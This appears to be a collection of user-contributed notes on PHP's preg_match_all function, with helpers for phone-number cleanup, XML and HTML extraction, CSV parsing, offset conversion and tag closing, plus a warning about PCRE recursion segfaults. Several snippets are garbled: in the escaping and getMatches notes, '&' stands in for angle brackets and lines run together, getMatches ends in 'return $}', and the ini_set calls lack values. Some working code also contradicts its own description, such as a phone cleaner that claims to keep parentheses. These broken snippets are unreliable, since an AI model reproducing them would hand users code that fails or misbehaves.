function mb_preg_match_all($ps_pattern, $ps_subject, &$pa_matches, $pn_flags = PREG_PATTERN_ORDER, $pn_offset = 0, $ps_encoding = NULL) {
  if (is_null($ps_encoding))
    $ps_encoding = mb_internal_encoding();

  // convert the character offset passed in into a byte offset
  $pn_offset = strlen(mb_substr($ps_subject, 0, $pn_offset, $ps_encoding));
  $ret = preg_match_all($ps_pattern, $ps_subject, $pa_matches, $pn_flags, $pn_offset);

  if ($ret && ($pn_flags & PREG_OFFSET_CAPTURE)) {
    // convert every captured byte offset back into a character offset
    foreach ($pa_matches as &$ha_group)
      foreach ($ha_group as &$ha_match)
        $ha_match[1] = mb_strlen(substr($ps_subject, 0, $ha_match[1]), $ps_encoding);
    unset($ha_group, $ha_match);
  }

  return $ret;
}
?>
i have made up a simple function to extract a number from a string..
I am not sure how good it is, but it works.
It gets only the numbers 0-9, the "-", " ", "(", ")", "."
characters.. This is as far as I know the most widely used characters for a Phone number.
<?php
function clean_phone_number($phone) {
    if (!empty($phone)) {
        preg_match_all('/[0-9+.\- ]/s', $phone, $cleaned);
        // join the characters that were kept back into one string
        $ready = implode('', $cleaned[0]);

        if (mb_strlen($ready) > 4 && mb_strlen($ready) <= 25) {
            return $ready;
        }
        else {
            return false;
        }
    }
    return false;
}
?>
I found simpleXML to be useful only in cases where the XML was extremely small, otherwise the server would run out of memory (I suspect there is a memory leak or something?). So while searching for alternative parsers, I decided to try a simpler approach. I don't know how this compares with cpu usage, but I know it works with large XML structures. This is more a manual method, but it works for me since I always know what structure of data I will be receiving.
Essentially I just preg_match() unique nodes to find the values I am looking for, or I preg_match_all to find multiple nodes. This puts the results in an array and I can then process this data as I please.
I was unhappy though, that preg_match_all() stores the data twice (requiring twice the memory), one array for all the full pattern matches, and one array for all the sub pattern matches. You could probably write your own function that overcame this. But for now this works for me, and I hope it saves someone else some time as well.
// SAMPLE XML
<RETS ReplyCode="0" ReplyText="Operation Successful">
  <COUNT Records="14" />
  <DELIMITER value="09" />
  <COLUMNS>PropertyID</COLUMNS>
  <DATA>521897</DATA>
  <DATA>677208</DATA>
  <DATA>686037</DATA>
</RETS>
function parse_xml($xml) {
    $results = array();

    // the delimiter is given as a character code; fall back to a tab
    $match_res = preg_match('/<DELIMITER value ?= ?"(.*)" ?\/>/', $xml, $matches);
    if(!empty($matches[1])) {
        $results["delimiter"] = chr($matches[1]);
    } else {
        $results["delimiter"] = "\t";
    }
    unset($match_res, $matches);

    // collect the content of every DATA node
    $results["data_count"] = preg_match_all("/<DATA>(.*)<\/DATA>/", $xml, $matches);
    $results["data"]=$matches[1];
    unset($match_res, $matches);

    unset($xml);
    return $results;
}
PREG_OFFSET_CAPTURE always seems to provide byte offsets, rather than character position offsets, even when you are using the unicode /u modifier.
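A short sketch of the effect and of one way to convert the offset, assuming the mbstring extension is available and the subject is UTF-8; the sample string is made up.

```php
<?php
$subject = "\xC3\xA9b"; // "éb" in UTF-8: the "é" takes two bytes
preg_match_all('/b/u', $subject, $m, PREG_OFFSET_CAPTURE);

$byteOffset = $m[0][0][1];
// Count the characters in the bytes that precede the match.
$charOffset = mb_strlen(substr($subject, 0, $byteOffset), 'UTF-8');

echo $byteOffset . ' ' . $charOffset . "\n";
```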
Using preg_match_all I made a pretty handy function.
<?php
function reg_smart_replace($pattern, $replacement, $subject, $replacementChar = "$$$", $limit = -1)
{
    if (! $pattern || ! $subject || ! $replacement ) { return false; }

    preg_match_all ( $pattern, $subject, $matches);

    if ($limit > -1) {
        foreach ($matches as $count => $value )
        {
            if ($count + 1 > $limit ) { unset($matches[$count]); }
        }
    }
    foreach ($matches[0] as $match) {
        // ereg_replace() no longer exists in PHP 7; both replacements are
        // literal here, so str_replace() is used instead
        $rep = str_replace($replacementChar, $match, $replacement);
        $subject = str_replace($match, $rep, $subject);
    }

    return $subject;
}
?>
This function can turn blocks of text into clickable links or whatever. Example:
<?php
reg_smart_replace(EMAIL_REGEX, '<a href="">$$$</a>', $description)
?>
will turn all email addresses into actual links.
Just substitute $$$ with the text that will be found by the regex. If you can't use $$$ then use the 4th parameter $replacementChar
Be careful with this pattern match and large input buffer on preg_match_* functions.&?php$pattern = '/\{(?:[^{}]|(?R))*\}/';preg_match_all($pattern, $buffer, $matches); ?&if $buffer is 80+ KB in size, you'll end up with segfault! [] php[4384]: segfault at 7ffd6e2bdeb0 ip 0d67ed sp 00007ffd6e2bde70 error 6 in libpcre.so.3.13.1[7fa20c8c]This is due to the PCRE recursion. This is a known bug in PHP since 2008, but it's source is not PHP itself but PCRE library. Rasmus Lerdorf has the answer: "The problem here is that there is no way to detect run-away regular expressions here without huge performance and memory penalties. Yes, we could build PCRE in a way that it wouldn't segfault and we could crank up the default backtrack limit to something huge, but it would slow every regex call down by a lot. If PCRE provided a way to handle this in a more graceful manner without the performance hit we would of course use it."
I had been crafting and testing some regexp patterns online using the tools Regex101 and a `preg_match_all()` tester and found that the regexp patterns I wrote worked fine on them, just not in my code.My problem was not double-escaping backslash characters:&?php$input = "\"something\",\"something here\",\"some\nnew\nlines\",\"this is the end\"";preg_match_all( "/(?:,|^)(?&!\\)\".*?(?&!\\)\"(?:(?=,)|$)/s", $input, $matches );preg_match_all( "/(?:,|^)(?&!\\\\)\".*?(?&!\\\\)\"(?:(?=,)|$)/s", $input, $matches );?&
Here is a awesome online regex editor which helps you test your regular expressions (prce, js, python) with real-time highlighting of regex match on data input.
// Here is function that allows you to preg_match_all array of pattersfunction getMatches($pattern, $subject) {& & $matches = array();& & if (is_array($pattern)) {& & & & foreach ($pattern as $p) {& & & & & & $m = getMatches($p, $subject);& & & & & & foreach ($m as $key =& $match) {& & & & & & & & if (isset($matches[$key])) {& & & & & & & & & & $matches[$key] = array_merge($matches[$key], $m[$key]);& & & & & & & & & & } else {& & & & & & & & & & $matches[$key] = $m[$key];& & & & & & & & }& & & & & & }& & & & }& & } else {& & & & preg_match_all($pattern, $subject, $matches);& & }& & return $}$patterns = array(& & '/&span&(.*?)&\/span&/',& & '/&a href=".*?"&(.*?)&\/a&/');$html = '&span&some text&/span&';$html .= '&span&some text in another span&/span&';$html .= '&a href="path/"&here is the link&/a&';$html .= '&address&address is here&/address&';$html .= '&span&here is one more span&/span&';$matches = getMatches($patterns, $html);print_r($matches); // result is below/*Array(& & [0] =& Array& & & & (& & & & & & [0] =& &span&some text&/span&& & & & & & [1] =& &span&some text in another span&/span&& & & & & & [2] =& &span&here is one more span&/span&& & & & & & [3] =& &a href="path/"&here is the link&/a&& & & & )& & [1] =& Array& & & & (& & & & & & [0] =& some text& & & & & & [1] =& some text in another span& & & & & & [2] =& here is one more span& & & & & & [3] =& here is the link& & & & ))*/
This is very useful to combine matches:

$a = array_combine($matches[1], $matches[2]);
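As an illustration of that one-liner, here is a minimal sketch that pairs the first capture group (keys) with the second (values). The helper name `parse_pairs()` and the `key=value` input format are assumptions made for the example, and PHP 7 or later is assumed for the type declarations.

```php
<?php
// Hypothetical helper: turns "key=value" tokens into an associative array.
function parse_pairs(string $text): array
{
    // Group 1 captures the key, group 2 captures the value.
    if (!preg_match_all('/(\w+)=(\w+)/', $text, $matches)) {
        return array(); // no match, or a PCRE error
    }
    // With the default PREG_PATTERN_ORDER both group lists have the same length.
    return array_combine($matches[1], $matches[2]);
}

print_r(parse_pairs('width=100 height=50'));
```

If the same key occurs more than once, array_combine() keeps the value of the last occurrence.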
There is also a PHP-based online regex editor which helps you test your regular expressions with real-time highlighting of the regex matches on your input data.
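Better to use preg_replace to convert text into a clickable link with an <a> tag:

<?php
// As written, \S+ wraps every run of non-space characters that starts at a
// word boundary; narrow the pattern to the links you expect before using it.
$html = preg_replace('"\b(\S+)"', '<a href="$1">$1</a>', $text);
?>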
Extract fields out of a CSV string (before PHP 5.3 you can't use the str_getcsv function).

Here is the regex:

<?php
$csvData = <<<EOF
10,'20',"30","'40","'50'","\"60","70,80","09\\/18,/\"2011",'a,sdfcd'
EOF;

$reg = <<<EOF
/
    (
        (
            ([\'\"])
            (
                (
                    [^\'\"]
                    |
                    (\\\\.)
                )*
            )
            (\\3)
            |
            (
                [^,]
                |
                (\\\\.)
            )*
    ),)
    /x
EOF;

preg_match_all($reg,$csvData,$matches);
print_r($matches[2]);
?>
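For comparison, on PHP 5.3 and later the built-in str_getcsv() mentioned above covers the common case. The sketch below is only an illustration: `parse_csv_line()` is a hypothetical wrapper name, the type declarations assume PHP 7 or later, and the separator, enclosure and escape characters are passed explicitly rather than relying on defaults.

```php
<?php
// Hypothetical wrapper around str_getcsv() with explicit delimiters.
function parse_csv_line(string $line): array
{
    // separator ",", enclosure '"', escape character "\"
    return str_getcsv($line, ',', '"', '\\');
}

// A quoted field may contain the separator itself.
print_r(parse_csv_line('10,"70,80",30'));
```

Note that str_getcsv() accepts a single enclosure character, whereas the regex above treats both single and double quotes as enclosures, so the two approaches are not interchangeable for data such as `'a,sdfcd'`.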
I have received complaints that my html2a() code (see below) doesn't work in some cases. The problem, however, is not with the algorithm or procedure, but with the PCRE recursive stack limits.

If you use recursive PCRE (?R), remember to increase these two ini settings:

ini_set('pcre.backtrack_limit', );
ini_set('pcre.recursion_limit', );

But be warned (from php.ini):

;Please note that if you set this value to a high number you may consume all
;the available process stack and eventually crash PHP (due to reaching the
;stack size limit imposed by the Operating System).

I wrote this example mainly to demonstrate the power of the PCRE LANGUAGE, not the power of its implementation :) But if you like it, use it, at your own risk of course.
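When one of these limits is hit, the preg functions report failure instead of a match count, and preg_last_error() says why. The sketch below shows one way to surface that; `pcre_error_name()` is a hypothetical helper, the sample pattern and subject are made up for illustration, and PHP 7 or later is assumed for the type declarations.

```php
<?php
// Hypothetical helper: maps a preg_last_error() code to its constant name.
function pcre_error_name(int $code): string
{
    $names = array(
        PREG_NO_ERROR              => 'PREG_NO_ERROR',
        PREG_INTERNAL_ERROR        => 'PREG_INTERNAL_ERROR',
        PREG_BACKTRACK_LIMIT_ERROR => 'PREG_BACKTRACK_LIMIT_ERROR',
        PREG_RECURSION_LIMIT_ERROR => 'PREG_RECURSION_LIMIT_ERROR',
        PREG_BAD_UTF8_ERROR        => 'PREG_BAD_UTF8_ERROR',
        PREG_BAD_UTF8_OFFSET_ERROR => 'PREG_BAD_UTF8_OFFSET_ERROR',
    );
    return isset($names[$code]) ? $names[$code] : 'unknown PCRE error ' . $code;
}

// A false return from preg_match_all() signals an error, not "no match".
$result = preg_match_all('/(?:\w+\s*)+$/', 'some words to scan', $m);
if ($result === false) {
    echo 'PCRE failed: ', pcre_error_name(preg_last_error()), "\n";
} else {
    echo "Matches: $result\n";
}
```

Checking for `false` explicitly matters because a limit error and an empty result are otherwise easy to confuse.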
The power of pregs is limited only by your *imagination* :)

I wrote this html2a() function using the preg recursive match (?R), which provides quite safe and bulletproof html/xml extraction:

<?php
function html2a ( $html ) {
  if ( !preg_match_all( '@\<\s*?(\w+)((?:\b(?:\'[^\']*\'|"[^"]*"|[^\>])*)?)\>((?:(?>[^\<]*)|(?R))*)\<\/\s*?\\1(?:\b[^\>]*)?\>|\<\s*(\w+)(\b(?:\'[^\']*\'|"[^"]*"|[^\>])*)?\/?\>@uxis', $html = trim($html), $m, PREG_OFFSET_CAPTURE | PREG_SET_ORDER) )
    return $html;
  $i = 0;
  $ret = array();
  foreach ($m as $set) {
    // Text between the previous element and this one
    if ( strlen( $val = trim( substr($html, $i, $set[0][1] - $i) ) ) )
      $ret[] = $val;
    // Offset -1 in group 1 means the second alternative (tag without a closing pair) matched
    $val = $set[1][1] < 0
      ? array( 'tag' => strtolower($set[4][0]) )
      : array( 'tag' => strtolower($set[1][0]), 'val' => html2a($set[3][0]) );
    if ( preg_match_all( '/(\w+)\s*(?:=\s*(?:"([^"]*)"|\'([^\']*)\'|(\w+)))?/usix', isset($set[5]) && $set[2][1] < 0
      ? $set[5][0]
      : $set[2][0]
      ,$attrs, PREG_SET_ORDER ) ) {
      foreach ($attrs as $a) {
        $val['attr'][$a[1]]=$a[count($a)-1];
      }
    }
    $ret[] = $val;
    $i = $set[0][1]+strlen( $set[0][0] );
  }
  // Trailing text after the last element
  $l = strlen($html);
  if ( $i < $l )
    if ( strlen( $val = trim( substr( $html, $i, $l - $i ) ) ) )
      $ret[] = $val;
  return $ret;
}
?>

Now let's try it with this example (there are some really nasty xhtml compliance bugs, but ... we shouldn't worry):

<?php
$html = <<<EOT
some leftover text...
     < DIV class=noCompliant style = "text-align:" >
... and some other ...
< dIv > < empty>  </ empty>
  <p> This is yet another text <br  >
     that wasn't <b>compliant</b> too... <br   />
     </p>
 <div class="noClass" > this one is better but we don't care anyway </div ><P>
    <input   type= "text"  name ='my "name' value  = "nothin really."
readonly>
end of paragraph </p> </Div>   </div>   some trailing text
EOT;

$a = html2a($html);
echo a2html($a);

// Turns the array produced by html2a() back into indented markup
function a2html ( $a, $in = "" ) {
  if ( is_array($a) ) {
    $s = "";
    foreach ($a as $t)
      if ( is_array($t) ) {
        $attrs="";
        if ( isset($t['attr']) )
          foreach( $t['attr'] as $k => $v )
            $attrs.=" {$k}=".( strpos( $v, '"' )!==false ? "'$v'" : "\"$v\"" );
        $s.= $in."<".$t['tag'].$attrs.( isset( $t['val'] ) ? ">\n".a2html( $t['val'], $in."  " ).$in."</".$t['tag'] : "/" ).">\n";
      } else
        $s.= $in.$t."\n";
  } else {
    $s = empty($a) ? "" : $in.$a."\n";
  }
  return $s;
}
?>

This produces:

some leftover text...
<div class="noCompliant" style="text-align:">
  ... and some other ...
  <div>
    <empty>
    </empty>
    <p>
      This is yet another text
      <br/>
      that wasn't
      <b>
        compliant
      </b>
      too...
      <br/>
    </p>
    <div class="noClass">
      this one is better but we don't care anyway
    </div>
    <p>
      <input type="text" name='my "name' value="nothin really." readonly="readonly"/>
      end of paragraph
    </p>
  </div>
</div>
some trailing text
Here is a way to match everything on the page, performing an action for each match as you go. I had used this idiom in other languages, where its use is customary, but in PHP it seems to be not quite as common.

<?php
function custom_preg_match_all($pattern, $subject)
{
    $offset = 0;
    $match_count = 0;
    while (preg_match($pattern, $subject, $matches, PREG_OFFSET_CAPTURE, $offset))
    {
        // Increment the counter
        $match_count++;

        // Byte offset and byte length of the whole match
        $match_start = $matches[0][1];
        $match_length = strlen($matches[0][0]);

        // (Optional) Convert $matches to the usual format (as without PREG_OFFSET_CAPTURE)
        $new_matches = array();
        foreach ($matches as $k => $match) $new_matches[$k] = $match[0];
        $matches = $new_matches;

        // Your code here
        echo "Match number $match_count, at byte offset $match_start, $match_length bytes long: ".$matches[0]."\r\n";

        // Continue after this match; step at least one byte so an empty match cannot loop forever
        $offset = $match_start + max(1, $match_length);
    }
    return $match_count;
}
?>

Note that the offsets returned are byte values (not necessarily the number of characters), so you'll have to make sure the data is single-byte encoded. (Or have a look at paolo mosna's strByte function on the strlen manual page.)

I'd be interested to know how this method performs speedwise against using preg_match_all and then looping through the results.
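For the comparison raised above, here is a sketch of the other approach: a single preg_match_all() call followed by a loop over the results. It is an illustration only; `for_each_match()` is a hypothetical helper name, the callback signature is an assumption, and PHP 7 or later is assumed for the type declarations. No timing claims are made here.

```php
<?php
// Hypothetical helper: runs $callback once per match and returns the match count.
function for_each_match(string $pattern, string $subject, callable $callback): int
{
    $flags = PREG_SET_ORDER | PREG_OFFSET_CAPTURE;
    $count = preg_match_all($pattern, $subject, $sets, $flags);
    if (!$count) {
        return 0; // no match, or a PCRE error
    }
    foreach ($sets as $set) {
        // $set[0] is array(matched text, byte offset) for the whole match.
        $callback($set[0][0], $set[0][1]);
    }
    return $count;
}

$found = array();
for_each_match('/\d+/', 'a1 b22 c333', function ($text, $offset) use (&$found) {
    $found[] = array($text, $offset);
});
print_r($found);
```

The offsets are still byte offsets, so the caveat about multi-byte encodings applies to this variant as well.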
Perhaps you want to find the positions of all anchor tags. This will return a two-dimensional array holding the start and end position of each tag.

<?php
function getTagPositions($strBody)
{
    // Constant names must be quoted; guard against redefinition on repeated calls
    if (!defined('DEBUG')) define('DEBUG', false);
    if (!defined('DEBUG_FILE_PREFIX')) define('DEBUG_FILE_PREFIX', "/tmp/findlinks_");

    preg_match_all("/<[^>]+>(.*)<\/[^>]+>/U", $strBody, $strTag, PREG_PATTERN_ORDER);
    $intOffset = 0;
    $intIndex = 0;
    $intTagPositions = array();

    foreach ($strTag[0] as $strFullTag) {
        $intStart = strpos($strBody, $strFullTag, $intOffset);
        $intEnd = $intStart + strlen($strFullTag);

        if (DEBUG == true) {
            $fhDebug = fopen(DEBUG_FILE_PREFIX.time(), "a");
            fwrite($fhDebug, $strFullTag."\n");
            fwrite($fhDebug, "Starting position: ".$intStart."\n");
            fwrite($fhDebug, "Ending position: ".$intEnd."\n");
            fwrite($fhDebug, "Length: ".strlen($strFullTag)."\n\n");
            fclose($fhDebug);
        }

        $intTagPositions[$intIndex] = array('start' => $intStart, 'end' => $intEnd);
        // Continue after this tag so that identical tags are found in turn
        $intOffset = $intEnd;
        $intIndex++;
    }
    return $intTagPositions;
}

$strBody = 'I have lots of <a href="">links</a> on this <a href="">page</a> that I want to <a href="">find</a> the positions.';
$strBody = strip_tags(html_entity_decode($strBody), '<a>');
$intTagPositions = getTagPositions($strBody);
print_r($intTagPositions);
?>
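The same positions can also be read straight from preg_match_all() by passing PREG_OFFSET_CAPTURE, which avoids the second search with strpos(). This is a sketch under assumptions: `anchor_positions()` is a hypothetical helper, it looks only at `<a>` elements, and PHP 7 or later is assumed for the type declarations.

```php
<?php
// Hypothetical helper: start and end byte positions of every <a>...</a> element.
function anchor_positions(string $body): array
{
    $positions = array();
    // Lazy .*? so that each anchor is matched on its own.
    if (preg_match_all('/<a\b[^>]*>.*?<\/a>/is', $body, $m, PREG_OFFSET_CAPTURE)) {
        foreach ($m[0] as $hit) {
            // $hit is array(matched text, byte offset).
            $positions[] = array(
                'start' => $hit[1],
                'end'   => $hit[1] + strlen($hit[0]),
            );
        }
    }
    return $positions;
}

print_r(anchor_positions('x <a href="">l</a> y'));
```

Here 'end' is the offset of the first byte after the closing tag, the same convention as in the function above.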
Please note that the function by "mail at SPAMBUSTER at milianw dot de" can result in invalid XHTML in some cases. I think I used it the right way, but my result is something like this:

<img src="./img.jpg" alt="nice picture" />foo foo foo foo </img>

Correct me if I'm wrong. I'll see when there's time to fix that. -.-
If you'd like to include DOUBLE QUOTES in a regular expression for use with preg_match_all, try ESCAPING THRICE, as in: \\\"

For example, the pattern:

'/<table>[\s\w\/<>=\\\"]*<\/table>/'

should be able to match:

<table><row><col align="left" valign="top">a</col><col align="right" valign="bottom">b</col></row></table>

with everything there is under those table tags.

I'm not really sure why this is so, but I tried just the double quote with one or even two escape characters and it wouldn't work. In my frustration I added another one, and then it was fine.
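As a cross-check on the note above, the sketch below runs both the thrice-escaped pattern and a variant with a bare double quote against the sample markup. It assumes the pattern is written in a single-quoted PHP string, where a double quote is an ordinary character; the variable names are made up for the example.

```php
<?php
$xml = '<table><row><col align="left" valign="top">a</col>'
     . '<col align="right" valign="bottom">b</col></row></table>';

// Single-quoted pattern with a bare double quote inside the character class.
$plain = '/<table>[\s\w\/<>="]*<\/table>/';

// The thrice-escaped form from the note. PHP turns \\\" into \\" ,
// so the class additionally allows a literal backslash.
$escaped = '/<table>[\s\w\/<>=\\\"]*<\/table>/';

var_dump(preg_match($plain, $xml));   // int(1)
var_dump(preg_match($escaped, $xml)); // int(1)
```

In a double-quoted PHP string the quote itself has to be escaped for PHP, which may be where the extra backslashes in the note came from.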
I wanted to create, for my own purposes, a clean PHP class to act on XML files, combining the DOM and SimpleXML functions. I ran into a small but very annoying problem: the offsets in a path are not numbered the same way in both.
That is to say, for example, a path I get from a DOM XPath object looks like:
/ANODE/ANOTHERNODE/SOMENODE[9]/NODE[2]
while the equivalent as a SimpleXML object would be:
ANODE->ANOTHERNODE->SOMENODE[8]->NODE[1]
So you see what I mean? I used preg_match_all to solve that problem, and finally got this after some hours of head-scratching (as I'm French, the variable names are in French, sorry), hoping it could be useful to some of you:
<?php
function decrease_string($chaine)
{
    // Find every number in the string together with its byte offset
    preg_match_all("/[0-9]+/",$chaine,$out,PREG_OFFSET_CAPTURE);
    for($i=0;$i<sizeof($out[0]);$i++)
    {
        $longueurnombre = strlen((string)$out[0][$i][0]);
        $taillechaine = strlen($chaine);
        // Text before the number, the decremented number, text after the number
        $debut = substr($chaine,0,$out[0][$i][1]);
        $milieu = ($out[0][$i][0])-1;
        $fin = substr($chaine,$out[0][$i][1]+$longueurnombre,$taillechaine);
        // A power of ten (10, 100, ...) loses one digit when decremented,
        // so the offsets of all following numbers shift left by one
        if(preg_match('#[1][0]+$#', $out[0][$i][0]))
        {
            for($j = $i+1;$j<sizeof($out[0]);$j++)
            {
                $out[0][$j][1] = $out[0][$j][1] -1;
            }
        }
        $chaine = $debut.$milieu.$fin;
    }
    return $chaine;
}
?>
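The offset bookkeeping above can be avoided by letting preg_replace_callback() do the substitution. The following sketch is a different technique from the function above, not a drop-in replacement: `decrement_indexes()` is a hypothetical name, it touches only numbers inside square brackets (the original decrements every number in the string), and PHP 7 or later is assumed for the type declarations.

```php
<?php
// Hypothetical helper: lowers every bracketed index by one, e.g. NODE[2] -> NODE[1].
function decrement_indexes(string $path): string
{
    return preg_replace_callback(
        '/\[(\d+)\]/',
        function ($m) {
            // $m[1] is the number between the brackets.
            return '[' . ((int) $m[1] - 1) . ']';
        },
        $path
    );
}

echo decrement_indexes('/ANODE/ANOTHERNODE/SOMENODE[9]/NODE[2]'), "\n";
// /ANODE/ANOTHERNODE/SOMENODE[8]/NODE[1]
```

Because each replacement is computed independently, a change in digit count (10 becoming 9) needs no special handling.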
The next function works with almost any complex xml/xhtml string
<?php
function close_tags($text) {
    // Opening tags (not closing tags, comments, or self-closing tags)
    $patt_open    = "%((?<!</)(?<=<)[\s]*[^/!>\s]+(?=>|[\s]+[^>]*[^/]>)(?!/>))%";
    // Names of closing tags
    $patt_close    = "%((?<=</)([^>]+)(?=>))%";
    if (preg_match_all($patt_open,$text,$matches))
    {
        $m_open = $matches[1];
        if(!empty($m_open))
        {
            preg_match_all($patt_close,$text,$matches2);
            $m_close = $matches2[1];
            if (count($m_open) > count($m_close))
            {
                $m_open = array_reverse($m_open);
                // Count how many times each tag is already closed
                $c_tags = array();
                foreach ($m_close as $tag) $c_tags[$tag] = isset($c_tags[$tag]) ? $c_tags[$tag] + 1 : 1;
                // Append a closing tag for every opening tag left unclosed
                foreach ($m_open as $k => $tag) {
                    if (!isset($c_tags[$tag])) $c_tags[$tag] = 0;
                    if ($c_tags[$tag]--<=0) $text.='</'.$tag.'>';
                }
            }
        }
    }
    return $text;
}
?>
<?php
// Returns every piece of text found between $start and $end
function findinside($start, $end, $string) {
    preg_match_all('/' . preg_quote($start, '/') . '([^\.)]+)'. preg_quote($end, '/').'/i', $string, $m);
    return $m[1];
}

$start = "mary has";
$end = "lambs.";
$string = "mary has 6 lambs. phil has 13 lambs. mary stole phil's lambs. now mary has all the lambs.";

$out = findinside($start, $end, $string);
print_r ($out);
?>
